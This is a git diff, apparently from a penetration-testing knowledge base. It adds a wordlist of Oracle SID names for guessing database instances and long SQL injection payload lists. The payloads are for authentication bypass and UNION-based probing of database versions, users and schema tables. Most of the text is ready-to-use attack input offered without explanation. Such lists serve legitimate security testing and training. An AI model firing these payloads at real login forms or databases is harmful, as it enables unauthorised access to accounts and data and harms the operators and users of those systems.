+BLA
+BOOKS
+BUDGET
+C630
+CLRExtProc
+CTM4_0
+CTM4_1
+CTM4_6
+D
+D10
+D8
+D9
+DB
+DB01
+DB02
+DB03
+DB1
+DB2
+DB2EDU
+DB2PROD
+DB2TEST
+DB3
+DBA
+DBA1
+DBA2
+DBA3
+DBA4
+DBA5
+DBA6
+DBA7
+DBA8
+DBA9
+DBX
+DEMO
+DEV
+DEV0
+DEV01
+DEV1
+DEV2
+DEV3
+DEV4
+DEV5
+DEV6
+DEV7
+DEV8
+DEV9
+DEVEL
+DIA1
+DIA2
+DIS
+DWH
+DWHDB
+DWHPROD
+DWHTEST
+DWRHS
+EARTH
+ELCARO
+EMRS2
+EOF
+ERP
+ESOR
+FINDEC
+FINPROD
+FNDFS_HR1
+FNDFS_HR2
+FPRD
+GR01
+GR02
+GR03
+HCDMO
+HEDGEHOG
+HPUX10
+HPUX11
+HPUX9
+HR
+HR0
+HR1
+HR2
+HR3
+HR4
+HR5
+HR6
+HR7
+HR8
+HR9
+HRDMO
+hsagent
+HTMLDB
+IAGTS
+IASDB
+INCD
+ISD01
+ISD06
+ISP
+ISP01
+ISP1
+ISP2
+ISQ1
+ITS
+IXOS
+KRAUS
+KRONOS
+LDAP
+LIN10
+LIN11
+LIN9
+LINUX101
+LINUX1011
+LINUX1012
+LINUX1013
+LINUX1014
+LINUX1015
+LINUX102
+LINUX1021
+LINUX1022
+LINUX1023
+LINUX1024
+LINUX1025
+LINUX111
+LINUX11106
+LINUX11107
+LINUX112
+LINUX11201
+LINUX817
+LINUX8171
+LINUX8172
+LINUX8173
+LINUX8174
+LINUX901
+LINUX902
+LINUX9021
+LINUX9022
+LINUX9023
+LINUX9024
+LINUX9025
+LINUX9026
+LINUX9027
+LINUX9028
+LINUX92
+LINUX9208
+LUN
+MDTEST
+MSAM
+MV713
+MYDB
+NEDB
+NORTHWIND
+OAS
+OAS1
+OAS10
+OAS2
+OAS3
+OAS4
+OAS5
+OAS6
+OAS7
+OAS8
+OAS9
+ODB
+OEMREP
+OGDP
+OID
+OJS
+OMS
+ORA
+ORA1
+ORA10
+ORA101
+ORA10101
+ORA10101P
+ORA10101T
+ORA10102
+ORA10102P
+ORA10102T
+ORA10103
+ORA10103P
+ORA10103T
+ORA10104
+ORA10104P
+ORA10104T
+ORA10105
+ORA10105P
+ORA10105T
+ORA1011
+ORA1011P
+ORA1011T
+ORA1012
+ORA1012P
+ORA1012T
+ORA1013
+ORA1013P
+ORA1013T
+ORA1014
+ORA1014P
+ORA1014T
+ORA1015
+ORA1015P
+ORA1015T
+ORA1021
+ORA1021P
+ORA1021T
+ORA1022
+ORA1022P
+ORA1022T
+ORA1023
+ORA1023P
+ORA1023T
+ORA1024
+ORA1024P
+ORA1024T
+ORA1025
+ORA1025P
+ORA1025T
+ORA11
+ORA111
+ORA11106
+ORA11107
+ORA112
+ORA11201
+ORA11202
+ORA11g
+ORA2
+ORA3
+ORA4
+ORA5
+ORA6
+ORA7
+ORA8
+ORA805
+ORA806
+ORA815
+ORA816
+ORA817
+ORA8170
+ORA8170P
+ORA8170T
+ORA8171
+ORA8171P
+ORA8171T
+ORA8172
+ORA8172P
+ORA8172T
+ORA8173
+ORA8173P
+ORA8173T
+ORA8174
+ORA8174P
+ORA8174T
+ORA8_SC
+ORA9
+ORA910
+ORA920
+ORA9201
+ORA9201P
+ORA9201T
+ORA9202
+ORA9202P
+ORA9202T
+ORA9203
+ORA9203P
+ORA9203T
+ORA9204
+ORA9204P
+ORA9204T
+ORA9205
+ORA9205P
+ORA9205T
+ORA9206
+ORA9206P
+ORA9206T
+ORA9207
+ORA9207P
+ORA9207T
+ORA9208
+ORA9208P
+ORA9208T
+ORACL
+ORACLE
+ORADB
+ORADB1
+ORADB2
+ORADB3
+ORALIN
+ORCL
+ORCL0
+ORCL1
+ORCL10
+ORCL10G
+ORCL11
+ORCL11G
+ORCL2
+ORCL3
+ORCL4
+ORCL5
+ORCL6
+ORCL7
+ORCL8
+ORCL9
+ORCLA
+ORCLB
+ORCLC
+ORCLD
+ORCLE
+ORCLF
+ORCLG
+ORCLH
+ORCLI
+ORCLJ
+ORCLK
+ORCLL
+ORCLM
+ORCLN
+ORCLO
+ORCLP
+ORCLP0
+ORCLP1
+ORCLP2
+ORCLP3
+ORCLP4
+ORCLP5
+ORCLP6
+ORCLP7
+ORCLP8
+ORCLP9
+ORCLQ
+ORCLR
+ORCLS
+ORCLSOL
+ORCLT
+ORCLU
+ORCLV
+ORCLW
+ORCL.WORLD
+ORCLX
+ORCLY
+ORCLZ
+ORIONDB
+ORTD
+P
+P10
+P10G
+P8
+P8I
+P9
+P9I
+PD1
+PINDB
+PLSExtProc
+PORA10101
+PORA10102
+PORA10103
+PORA10104
+PORA10105
+PORA1011
+PORA1012
+PORA1013
+PORA1014
+PORA1015
+PORA1021
+PORA1022
+PORA1023
+PORA1024
+PORA1025
+PORA11106
+PORA11107
+PORA11201
+PORA11202
+PORA8170
+PORA8171
+PORA8172
+PORA8173
+PORA8174
+PORA9201
+PORA9202
+PORA9203
+PORA9204
+PORA9205
+PORA9206
+PORA9207
+PORA9208
+PRD
+PRITXI
+PROD
+PROD0
+PROD1
+PROD10
+PROD10G
+PROD11
+PROD11G
+PROD2
+PROD3
+PROD4
+PROD5
+PROD6
+PROD7
+PROD8
+PROD8I
+PROD9
+PROD920
+PROD9I
+PROG10
+QM
+QS
+RAB1
+RAC
+RAC1
+RAC2
+RAC3
+RAC4
+RDB
+RDS
+RECV
+REP
+REP0
+REP1
+REP2
+REP3
+REP4
+REP5
+REP6
+REP7
+REP8
+REP9
+REPO
+REPO0
+REPO1
+REPO2
+REPO3
+REPO4
+REPO5
+REPO6
+REPO7
+REPO8
+REPO9
+REPOS
+REPOS0
+REPOS1
+REPOS2
+REPOS3
+REPOS4
+REPOS5
+REPOS6
+REPOS7
+REPOS8
+REPOS9
+REPSCAN
+RIPPROD
+RITCTL
+RITDEV
+RITPROD
+RITQA
+RITTRN
+RITTST
+SA0
+SA1
+SA2
+SA3
+SA4
+SA5
+SA6
+SA7
+SA8
+SA9
+SAA
+SAB
+SAC
+SAD
+SAE
+SAF
+SAG
+SAH
+SAI
+SAJ
+SAK
+SAL
+SALES
+SAM
+SAMPLE
+SAN
+SANIPSP
+SAO
+SAP
+SAP0
+SAP1
+SAP2
+SAP3
+SAP4
+SAP5
+SAP6
+SAP7
+SAP8
+SAP9
+SAPHR
+SAQ
+SAR
+SAS
+SAT
+SAU
+SAV
+SAW
+SAX
+SAY
+SAZ
+SDB
+SENTRIGO
+SES
+SGNT
+SID0
+SID1
+SID2
+SID3
+SID4
+SID5
+SID6
+SID7
+SID8
+SID9
+SIP
+SOL10
+SOL11
+SOL9
+STAG1
+STAG2
+T1
+T10
+T101
+T102
+T2
+T3
+T4
+T7
+T71
+T72
+T73
+T8
+T80
+T81
+T82
+T9
+T91
+T92
+TEST
+TEST10G
+TEST11G
+TEST9I
+TESTORCL
+THUMPER
+TRC28
+TRIUMF
+TSH1
+TSM
+TST
+TST0
+TST1
+TST2
+TST3
+TST4
+TST5
+TST6
+TST7
+TST8
+TST9
+TYCP
+UNIX101
+UNIX1011
+UNIX1012
+UNIX1013
+UNIX1014
+UNIX1015
+UNIX102
+UNIX1021
+UNIX1022
+UNIX1023
+UNIX1024
+UNIX1025
+UNIX817
+UNIX8171
+UNIX8172
+UNIX8173
+UNIX8174
+UNIX901
+UNIX902
+UNIX9021
+UNIX9022
+UNIX9023
+UNIX9024
+UNIX9025
+UNIX9026
+UNIX9027
+UNIX9028
+V713
+VENOM
+VENU
+VISTA
+W101
+W1011
+W1012
+W1013
+W1014
+W1015
+W102
+W1021
+W1022
+W1023
+W1024
+W1025
+W111
+W11102
+W11106
+W11107
+W112
+W11201
+W817
+W8171
+W8172
+W8173
+W8174
+W901
+W902
+W9021
+W9022
+W9023
+W9024
+W9025
+W9026
+W9027
+W9028
+WEB
+WEB1
+WEB10
+WEB2
+WEB3
+WEB4
+WEB5
+WEB6
+WEB7
+WEB8
+WEB9
+WEBDEV
+WG73
+WG73 
+WIN101
+WIN1011
+WIN1012
+WIN1013
+WIN1014
+WIN1015
+WIN102
+WIN1021
+WIN1022
+WIN1023
+WIN1024
+WIN1025
+WIN11
+WIN111
+WIN11106
+WIN11107
+WIN112
+WIN11201
+WIN11202
+WIN7
+WIN817
+WIN8171
+WIN8172
+WIN8173
+WIN8174
+WIN901
+WIN902
+WIN9021
+WIN9022
+WIN9023
+WIN9024
+WIN9025
+WIN9026
+WIN9027
+WIN9028
+WINDOWS101
+WINDOWS1011
+WINDOWS1012
+WINDOWS1013
+WINDOWS1014
+WINDOWS1015
+WINDOWS102
+WINDOWS1021
+WINDOWS1022
+WINDOWS1023
+WINDOWS1024
+WINDOWS1025
+WINDOWS11
+WINDOWS111
+WINDOWS11106
+WINDOWS11107
+WINDOWS112
+WINDOWS11201
+WINDOWS11202
+WINDOWS817
+WINDOWS8171
+WINDOWS8172
+WINDOWS8173
+WINDOWS8174
+WINDOWS901
+WINDOWS902
+WINDOWS9021
+WINDOWS9022
+WINDOWS9023
+WINDOWS9024
+WINDOWS9025
+WINDOWS9026
+WINDOWS9027
+WINDOWS9028
+XE
+XEXDB
+XE_XPT
diff --git a/.gitbook/assets/smbexec_prompt.png b/.gitbook/assets/smbexec_prompt.png
new file mode 100644
index 00000000..88945a86
Binary files /dev/null and b/.gitbook/assets/smbexec_prompt.png differ
diff --git a/.gitbook/assets/smbexec_service.png b/.gitbook/assets/smbexec_service.png
new file mode 100644
index 00000000..674088bd
Binary files /dev/null and b/.gitbook/assets/smbexec_service.png differ
diff --git a/.gitbook/assets/snmp_oid_mib_tree.png b/.gitbook/assets/snmp_oid_mib_tree.png
new file mode 100644
index 00000000..59fede67
Binary files /dev/null and b/.gitbook/assets/snmp_oid_mib_tree.png differ
diff --git a/.gitbook/assets/sqli-1.txt b/.gitbook/assets/sqli-1.txt
new file mode 100644
index 00000000..3952738e
--- /dev/null
+++ b/.gitbook/assets/sqli-1.txt
@@ -0,0 +1,49 @@
+true
+1
+1>0
+2-1
+0+1
+1*1
+1%2
+1=1
+1 & 1
+1&1
+1 && 2
+1&&2
+-1 || 1
+|1||1
+-1 oR 1
+1 aND 1
+1 LikE 1
+(1)oR(1)
+(1)aND(1)
+(1)LikE(1)
+-1/**/oR/**/1
+1/**/aND/**/1
+1/**/LikE/**/1
+1'
+1'>'0
+2'-'1
+0'+'1
+1'*'1
+1'%'2
+1'='1
+1'&'1
+1'&&'2
+-1'||'1
+-1'oR'1
+1'aND'1
+1'LikE'1
+1"
+1">"0
+2"-"1
+0"+"1
+1"*"1
+1"%"2
+1"="1
+1"&"1
+1"&&"2
+-1"||"1
+-1"oR"1
+1"aND"1
+1"LikE"1
\ No newline at end of file
diff --git a/.gitbook/assets/sqli-authbypass-big.txt b/.gitbook/assets/sqli-authbypass-big.txt
new file mode 100644
index 00000000..5a03da57
--- /dev/null
+++ b/.gitbook/assets/sqli-authbypass-big.txt
@@ -0,0 +1,771 @@
+'-'
+' '
+'&'
+'^'
+'*'
+' or ''-'
+' or '' '
+' or ''&'
+' or ''^'
+' or ''*'
+"-"
+" "
+"&"
+"^"
+"*"
+" or ""-"
+" or "" "
+" or ""&"
+" or ""^"
+" or ""*"
+or true--
+" or true--
+' or true--
+") or true--
+') or true--
+' or 'x'='x
+') or ('x')=('x
+')) or (('x'))=(('x
+" or "x"="x
+") or ("x")=("x
+")) or (("x"))=(("x
+or 1=1
+or 1=1--
+or 1=1#
+or 1=1/*
+admin' --
+admin' #
+admin'/*
+admin' or '1'='1
+admin' or '1'='1'--
+admin' or '1'='1'#
+admin' or '1'='1'/*
+admin'or 1=1 or ''='
+admin' or 1=1
+admin' or 1=1--
+admin' or 1=1#
+admin' or 1=1/*
+admin') or ('1'='1
+admin') or ('1'='1'--
+admin') or ('1'='1'#
+admin') or ('1'='1'/*
+admin') or '1'='1
+admin') or '1'='1'--
+admin') or '1'='1'#
+admin') or '1'='1'/*
+1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
+admin" --
+admin" #
+admin"/*
+admin" or "1"="1
+admin" or "1"="1"--
+admin" or "1"="1"#
+admin" or "1"="1"/*
+admin"or 1=1 or ""="
+admin" or 1=1
+admin" or 1=1--
+admin" or 1=1#
+admin" or 1=1/*
+admin") or ("1"="1
+admin") or ("1"="1"--
+admin") or ("1"="1"#
+admin") or ("1"="1"/*
+admin") or "1"="1
+admin") or "1"="1"--
+admin") or "1"="1"#
+admin") or "1"="1"/*
+1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
+==
+=
+'
+' --
+' #
+' –
+'--
+'/*
+'#
+" --
+" #
+"/*
+' and 1='1
+' and a='a
+ or 1=1
+ or true
+' or ''='
+" or ""="
+1′) and '1′='1–
+' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
+" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
+ and 1=1
+ and 1=1–
+' and 'one'='one
+' and 'one'='one–
+' group by password having 1=1--
+' group by userid having 1=1--
+' group by username having 1=1--
+ like '%'
+ or 0=0 --
+ or 0=0 #
+ or 0=0 –
+' or         0=0 #
+' or 0=0 --
+' or 0=0 #
+' or 0=0 –
+" or 0=0 --
+" or 0=0 #
+" or 0=0 –
+%' or '0'='0
+ or 1=1
+ or 1=1--
+ or 1=1/*
+ or 1=1#
+ or 1=1–
+' or 1=1--
+' or '1'='1
+' or '1'='1'--
+' or '1'='1'/*
+' or '1'='1'#
+' or '1′='1
+' or 1=1
+' or 1=1 --
+' or 1=1 –
+' or 1=1--
+' or 1=1;#
+' or 1=1/*
+' or 1=1#
+' or 1=1–
+') or '1'='1
+') or '1'='1--
+') or '1'='1'--
+') or '1'='1'/*
+') or '1'='1'#
+') or ('1'='1
+') or ('1'='1--
+') or ('1'='1'--
+') or ('1'='1'/*
+') or ('1'='1'#
+'or'1=1
+'or'1=1′
+" or "1"="1
+" or "1"="1"--
+" or "1"="1"/*
+" or "1"="1"#
+" or 1=1
+" or 1=1 --
+" or 1=1 –
+" or 1=1--
+" or 1=1/*
+" or 1=1#
+" or 1=1–
+") or "1"="1
+") or "1"="1"--
+") or "1"="1"/*
+") or "1"="1"#
+") or ("1"="1
+") or ("1"="1"--
+") or ("1"="1"/*
+") or ("1"="1"#
+) or '1′='1–
+) or ('1′='1–
+' or 1=1 LIMIT 1;#
+'or 1=1 or ''='
+"or 1=1 or ""="
+' or 'a'='a
+' or a=a--
+' or a=a–
+') or ('a'='a
+" or "a"="a
+") or ("a"="a
+') or ('a'='a and hi") or ("a"="a
+' or 'one'='one
+' or 'one'='one–
+' or uid like '%
+' or uname like '%
+' or userid like '%
+' or user like '%
+' or username like '%
+' or 'x'='x
+') or ('x'='x
+" or "x"="x
+' OR 'x'='x'#;
+'=' 'or' and '=' 'or'
+' UNION ALL SELECT 1, @@version;#
+' UNION ALL SELECT system_user(),user();#
+' UNION select table_schema,table_name FROM information_Schema.tables;#
+admin' and substring(password/text(),1,1)='7
+' and substring(password/text(),1,1)='7
+
+==
+=
+'
+"
+'-- 2
+'/*
+'#
+"-- 2
+" #
+"/*
+'-'
+'&'
+'^'
+'*'
+'='
+0'<'2
+"-"
+"&"
+"^"
+"*"
+"="
+0"<"2
+
+')
+")
+')-- 2
+')/*
+')#
+")-- 2
+") #
+")/*
+')-('
+')&('
+')^('
+')*('
+')=('
+0')<('2
+")-("
+")&("
+")^("
+")*("
+")=("
+0")<("2
+
+'-''-- 2
+'-''#
+'-''/*
+'&''-- 2
+'&''#
+'&''/*
+'^''-- 2
+'^''#
+'^''/*
+'*''-- 2
+'*''#
+'*''/*
+'=''-- 2
+'=''#
+'=''/*
+0'<'2'-- 2
+0'<'2'#
+0'<'2'/*
+"-""-- 2
+"-""#
+"-""/*
+"&""-- 2
+"&""#
+"&""/*
+"^""-- 2
+"^""#
+"^""/*
+"*""-- 2
+"*""#
+"*""/*
+"=""-- 2
+"=""#
+"=""/*
+0"<"2"-- 2
+0"<"2"#
+0"<"2"/*
+
+')-''-- 2
+')-''#
+')-''/*
+')&''-- 2
+')&''#
+')&''/*
+')^''-- 2
+')^''#
+')^''/*
+')*''-- 2
+')*''#
+')*''/*
+')=''-- 2
+')=''#
+')=''/*
+0')<'2'-- 2
+0')<'2'#
+0')<'2'/*
+")-""-- 2
+")-""#
+")-""/*
+")&""-- 2
+")&""#
+")&""/*
+")^""-- 2
+")^""#
+")^""/*
+")*""-- 2
+")*""#
+")*""/*
+")=""-- 2
+")=""#
+")=""/*
+0")<"2-- 2
+0")<"2#
+0")<"2/*
+
+
+'oR'2
+'oR'2'-- 2
+'oR'2'#
+'oR'2'/*
+'oR'2'oR'
+'oR(2)-- 2
+'oR(2)#
+'oR(2)/*
+'oR(2)oR'
+'oR 2-- 2
+'oR 2#
+'oR 2/*
+'oR 2 oR'
+'oR/**/2-- 2
+'oR/**/2#
+'oR/**/2/*
+'oR/**/2/**/oR'
+"oR"2
+"oR"2"-- 2
+"oR"2"#
+"oR"2"/*
+"oR"2"oR"
+"oR(2)-- 2
+"oR(2)#
+"oR(2)/*
+"oR(2)oR"
+"oR 2-- 2
+"oR 2#
+"oR 2/*
+"oR 2 oR"
+"oR/**/2-- 2
+"oR/**/2#
+"oR/**/2/*
+"oR/**/2/**/oR"
+
+'oR'2'='2
+'oR'2'='2'oR'
+'oR'2'='2'-- 2
+'oR'2'='2'#
+'oR'2'='2'/*
+'oR'2'='2'oR'
+'oR 2=2-- 2
+'oR 2=2#
+'oR 2=2/*
+'oR 2=2 oR'
+'oR/**/2=2-- 2
+'oR/**/2=2#
+'oR/**/2=2/*
+'oR/**/2=2/**/oR'
+'oR(2)=2-- 2
+'oR(2)=2#
+'oR(2)=2/*
+'oR(2)=2/*
+'oR(2)=(2)oR'
+'oR'2'='2' LimIT 1-- 2
+'oR'2'='2' LimIT 1#
+'oR'2'='2' LimIT 1/*
+'oR(2)=(2)LimIT(1)-- 2
+'oR(2)=(2)LimIT(1)#
+'oR(2)=(2)LimIT(1)/*
+"oR"2"="2
+"oR"2"="2"oR"
+"oR"2"="2"-- 2
+"oR"2"="2"#
+"oR"2"="2"/*
+"oR"2"="2"oR"
+"oR 2=2-- 2
+"oR 2=2#
+"oR 2=2/*
+"oR 2=2 oR"
+"oR/**/2=2-- 2
+"oR/**/2=2#
+"oR/**/2=2/*
+"oR/**/2=2/**/oR"
+"oR(2)=2-- 2
+"oR(2)=2#
+"oR(2)=2/*
+"oR(2)=2/*
+"oR(2)=(2)oR"
+"oR"2"="2" LimIT 1-- 2
+"oR"2"="2" LimIT 1#
+"oR"2"="2" LimIT 1/*
+"oR(2)=(2)LimIT(1)-- 2
+"oR(2)=(2)LimIT(1)#
+"oR(2)=(2)LimIT(1)/*
+
+'oR true-- 2
+'oR true#
+'oR true/*
+'oR true oR'
+'oR(true)-- 2
+'oR(true)#
+'oR(true)/*
+'oR(true)oR'
+'oR/**/true-- 2
+'oR/**/true#
+'oR/**/true/*
+'oR/**/true/**/oR'
+"oR true-- 2
+"oR true#
+"oR true/*
+"oR true oR"
+"oR(true)-- 2
+"oR(true)#
+"oR(true)/*
+"oR(true)oR"
+"oR/**/true-- 2
+"oR/**/true#
+"oR/**/true/*
+"oR/**/true/**/oR"
+
+'oR'2'LiKE'2
+'oR'2'LiKE'2'-- 2
+'oR'2'LiKE'2'#
+'oR'2'LiKE'2'/*
+'oR'2'LiKE'2'oR'
+'oR(2)LiKE(2)-- 2
+'oR(2)LiKE(2)#
+'oR(2)LiKE(2)/*
+'oR(2)LiKE(2)oR'
+"oR"2"LiKE"2
+"oR"2"LiKE"2"-- 2
+"oR"2"LiKE"2"#
+"oR"2"LiKE"2"/*
+"oR"2"LiKE"2"oR"
+"oR(2)LiKE(2)-- 2
+"oR(2)LiKE(2)#
+"oR(2)LiKE(2)/*
+"oR(2)LiKE(2)oR"
+
+admin
+admin'-- 2
+admin'#
+admin'/*
+admin"-- 2
+admin"#
+ffifdyop
+
+' UniON SElecT 1,2-- 2
+' UniON SElecT 1,2,3-- 2
+' UniON SElecT 1,2,3,4-- 2
+' UniON SElecT 1,2,3,4,5-- 2
+' UniON SElecT 1,2#
+' UniON SElecT 1,2,3#
+' UniON SElecT 1,2,3,4#
+' UniON SElecT 1,2,3,4,5#
+'UniON(SElecT(1),2)-- 2
+'UniON(SElecT(1),2,3)-- 2
+'UniON(SElecT(1),2,3,4)-- 2
+'UniON(SElecT(1),2,3,4,5)-- 2
+'UniON(SElecT(1),2)#
+'UniON(SElecT(1),2,3)#
+'UniON(SElecT(1),2,3,4)#
+'UniON(SElecT(1),2,3,4,5)#
+" UniON SElecT 1,2-- 2
+" UniON SElecT 1,2,3-- 2
+" UniON SElecT 1,2,3,4-- 2
+" UniON SElecT 1,2,3,4,5-- 2
+" UniON SElecT 1,2#
+" UniON SElecT 1,2,3#
+" UniON SElecT 1,2,3,4#
+" UniON SElecT 1,2,3,4,5#
+"UniON(SElecT(1),2)-- 2
+"UniON(SElecT(1),2,3)-- 2
+"UniON(SElecT(1),2,3,4)-- 2
+"UniON(SElecT(1),2,3,4,5)-- 2
+"UniON(SElecT(1),2)#
+"UniON(SElecT(1),2,3)#
+"UniON(SElecT(1),2,3,4)#
+"UniON(SElecT(1),2,3,4,5)#
+
+'||'2
+'||2-- 2
+'||'2'||'
+'||2#
+'||2/*
+'||2||'
+"||"2
+"||2-- 2
+"||"2"||"
+"||2#
+"||2/*
+"||2||"
+'||'2'='2
+'||'2'='2'||'
+'||2=2-- 2
+'||2=2#
+'||2=2/*
+'||2=2||'
+"||"2"="2
+"||"2"="2"||"
+"||2=2-- 2
+"||2=2#
+"||2=2/*
+"||2=2||"
+'||2=(2)LimIT(1)-- 2
+'||2=(2)LimIT(1)#
+'||2=(2)LimIT(1)/*
+"||2=(2)LimIT(1)-- 2
+"||2=(2)LimIT(1)#
+"||2=(2)LimIT(1)/*
+'||true-- 2
+'||true#
+'||true/*
+'||true||'
+"||true-- 2
+"||true#
+"||true/*
+"||true||"
+'||'2'LiKE'2
+'||'2'LiKE'2'-- 2
+'||'2'LiKE'2'#
+'||'2'LiKE'2'/*
+'||'2'LiKE'2'||'
+'||(2)LiKE(2)-- 2
+'||(2)LiKE(2)#
+'||(2)LiKE(2)/*
+'||(2)LiKE(2)||'
+"||"2"LiKE"2
+"||"2"LiKE"2"-- 2
+"||"2"LiKE"2"#
+"||"2"LiKE"2"/*
+"||"2"LiKE"2"||"
+"||(2)LiKE(2)-- 2
+"||(2)LiKE(2)#
+"||(2)LiKE(2)/*
+"||(2)LiKE(2)||"
+
+')oR('2
+')oR'2'-- 2
+')oR'2'#
+')oR'2'/*
+')oR'2'oR('
+')oR(2)-- 2
+')oR(2)#
+')oR(2)/*
+')oR(2)oR('
+')oR 2-- 2
+')oR 2#
+')oR 2/*
+')oR 2 oR('
+')oR/**/2-- 2
+')oR/**/2#
+')oR/**/2/*
+')oR/**/2/**/oR('
+")oR("2
+")oR"2"-- 2
+")oR"2"#
+")oR"2"/*
+")oR"2"oR("
+")oR(2)-- 2
+")oR(2)#
+")oR(2)/*
+")oR(2)oR("
+")oR 2-- 2
+")oR 2#
+")oR 2/*
+")oR 2 oR("
+")oR/**/2-- 2
+")oR/**/2#
+")oR/**/2/*
+")oR/**/2/**/oR("
+')oR'2'=('2
+')oR'2'='2'oR('
+')oR'2'='2'-- 2
+')oR'2'='2'#
+')oR'2'='2'/*
+')oR'2'='2'oR('
+')oR 2=2-- 2
+')oR 2=2#
+')oR 2=2/*
+')oR 2=2 oR('
+')oR/**/2=2-- 2
+')oR/**/2=2#
+')oR/**/2=2/*
+')oR/**/2=2/**/oR('
+')oR(2)=2-- 2
+')oR(2)=2#
+')oR(2)=2/*
+')oR(2)=2/*
+')oR(2)=(2)oR('
+')oR'2'='2' LimIT 1-- 2
+')oR'2'='2' LimIT 1#
+')oR'2'='2' LimIT 1/*
+')oR(2)=(2)LimIT(1)-- 2
+')oR(2)=(2)LimIT(1)#
+')oR(2)=(2)LimIT(1)/*
+")oR"2"=("2
+")oR"2"="2"oR("
+")oR"2"="2"-- 2
+")oR"2"="2"#
+")oR"2"="2"/*
+")oR"2"="2"oR("
+")oR 2=2-- 2
+")oR 2=2#
+")oR 2=2/*
+")oR 2=2 oR("
+")oR/**/2=2-- 2
+")oR/**/2=2#
+")oR/**/2=2/*
+")oR/**/2=2/**/oR("
+")oR(2)=2-- 2
+")oR(2)=2#
+")oR(2)=2/*
+")oR(2)=2/*
+")oR(2)=(2)oR("
+")oR"2"="2" LimIT 1-- 2
+")oR"2"="2" LimIT 1#
+")oR"2"="2" LimIT 1/*
+")oR(2)=(2)LimIT(1)-- 2
+")oR(2)=(2)LimIT(1)#
+")oR(2)=(2)LimIT(1)/*
+')oR true-- 2
+')oR true#
+')oR true/*
+')oR true oR('
+')oR(true)-- 2
+')oR(true)#
+')oR(true)/*
+')oR(true)oR('
+')oR/**/true-- 2
+')oR/**/true#
+')oR/**/true/*
+')oR/**/true/**/oR('
+")oR true-- 2
+")oR true#
+")oR true/*
+")oR true oR("
+")oR(true)-- 2
+")oR(true)#
+")oR(true)/*
+")oR(true)oR("
+")oR/**/true-- 2
+")oR/**/true#
+")oR/**/true/*
+")oR/**/true/**/oR("
+')oR'2'LiKE('2
+')oR'2'LiKE'2'-- 2
+')oR'2'LiKE'2'#
+')oR'2'LiKE'2'/*
+')oR'2'LiKE'2'oR('
+')oR(2)LiKE(2)-- 2
+')oR(2)LiKE(2)#
+')oR(2)LiKE(2)/*
+')oR(2)LiKE(2)oR('
+")oR"2"LiKE("2
+")oR"2"LiKE"2"-- 2
+")oR"2"LiKE"2"#
+")oR"2"LiKE"2"/*
+")oR"2"LiKE"2"oR("
+")oR(2)LiKE(2)-- 2
+")oR(2)LiKE(2)#
+")oR(2)LiKE(2)/*
+")oR(2)LiKE(2)oR("
+admin')-- 2
+admin')#
+admin')/*
+admin")-- 2
+admin")#
+') UniON SElecT 1,2-- 2
+') UniON SElecT 1,2,3-- 2
+') UniON SElecT 1,2,3,4-- 2
+') UniON SElecT 1,2,3,4,5-- 2
+') UniON SElecT 1,2#
+') UniON SElecT 1,2,3#
+') UniON SElecT 1,2,3,4#
+') UniON SElecT 1,2,3,4,5#
+')UniON(SElecT(1),2)-- 2
+')UniON(SElecT(1),2,3)-- 2
+')UniON(SElecT(1),2,3,4)-- 2
+')UniON(SElecT(1),2,3,4,5)-- 2
+')UniON(SElecT(1),2)#
+')UniON(SElecT(1),2,3)#
+')UniON(SElecT(1),2,3,4)#
+')UniON(SElecT(1),2,3,4,5)#
+") UniON SElecT 1,2-- 2
+") UniON SElecT 1,2,3-- 2
+") UniON SElecT 1,2,3,4-- 2
+") UniON SElecT 1,2,3,4,5-- 2
+") UniON SElecT 1,2#
+") UniON SElecT 1,2,3#
+") UniON SElecT 1,2,3,4#
+") UniON SElecT 1,2,3,4,5#
+")UniON(SElecT(1),2)-- 2
+")UniON(SElecT(1),2,3)-- 2
+")UniON(SElecT(1),2,3,4)-- 2
+")UniON(SElecT(1),2,3,4,5)-- 2
+")UniON(SElecT(1),2)#
+")UniON(SElecT(1),2,3)#
+")UniON(SElecT(1),2,3,4)#
+")UniON(SElecT(1),2,3,4,5)#
+')||('2
+')||2-- 2
+')||'2'||('
+')||2#
+')||2/*
+')||2||('
+")||("2
+")||2-- 2
+")||"2"||("
+")||2#
+")||2/*
+")||2||("
+')||'2'=('2
+')||'2'='2'||('
+')||2=2-- 2
+')||2=2#
+')||2=2/*
+')||2=2||('
+")||"2"=("2
+")||"2"="2"||("
+")||2=2-- 2
+")||2=2#
+")||2=2/*
+")||2=2||("
+')||2=(2)LimIT(1)-- 2
+')||2=(2)LimIT(1)#
+')||2=(2)LimIT(1)/*
+")||2=(2)LimIT(1)-- 2
+")||2=(2)LimIT(1)#
+")||2=(2)LimIT(1)/*
+')||true-- 2
+')||true#
+')||true/*
+')||true||('
+")||true-- 2
+")||true#
+")||true/*
+")||true||("
+')||'2'LiKE('2
+')||'2'LiKE'2'-- 2
+')||'2'LiKE'2'#
+')||'2'LiKE'2'/*
+')||'2'LiKE'2'||('
+')||(2)LiKE(2)-- 2
+')||(2)LiKE(2)#
+')||(2)LiKE(2)/*
+')||(2)LiKE(2)||('
+")||"2"LiKE("2
+")||"2"LiKE"2"-- 2
+")||"2"LiKE"2"#
+")||"2"LiKE"2"/*
+")||"2"LiKE"2"||("
+")||(2)LiKE(2)-- 2
+")||(2)LiKE(2)#
+")||(2)LiKE(2)/*
+")||(2)LiKE(2)||("
+' UnION SELeCT 1,2`
+' UnION SELeCT 1,2,3`
+' UnION SELeCT 1,2,3,4`
+' UnION SELeCT 1,2,3,4,5`
+" UnION SELeCT 1,2`
+" UnION SELeCT 1,2,3`
+" UnION SELeCT 1,2,3,4`
+" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/.gitbook/assets/sqli-authbypass-long.txt b/.gitbook/assets/sqli-authbypass-long.txt
new file mode 100644
index 00000000..5a03da57
--- /dev/null
+++ b/.gitbook/assets/sqli-authbypass-long.txt
@@ -0,0 +1,771 @@
+'-'
+' '
+'&'
+'^'
+'*'
+' or ''-'
+' or '' '
+' or ''&'
+' or ''^'
+' or ''*'
+"-"
+" "
+"&"
+"^"
+"*"
+" or ""-"
+" or "" "
+" or ""&"
+" or ""^"
+" or ""*"
+or true--
+" or true--
+' or true--
+") or true--
+') or true--
+' or 'x'='x
+') or ('x')=('x
+')) or (('x'))=(('x
+" or "x"="x
+") or ("x")=("x
+")) or (("x"))=(("x
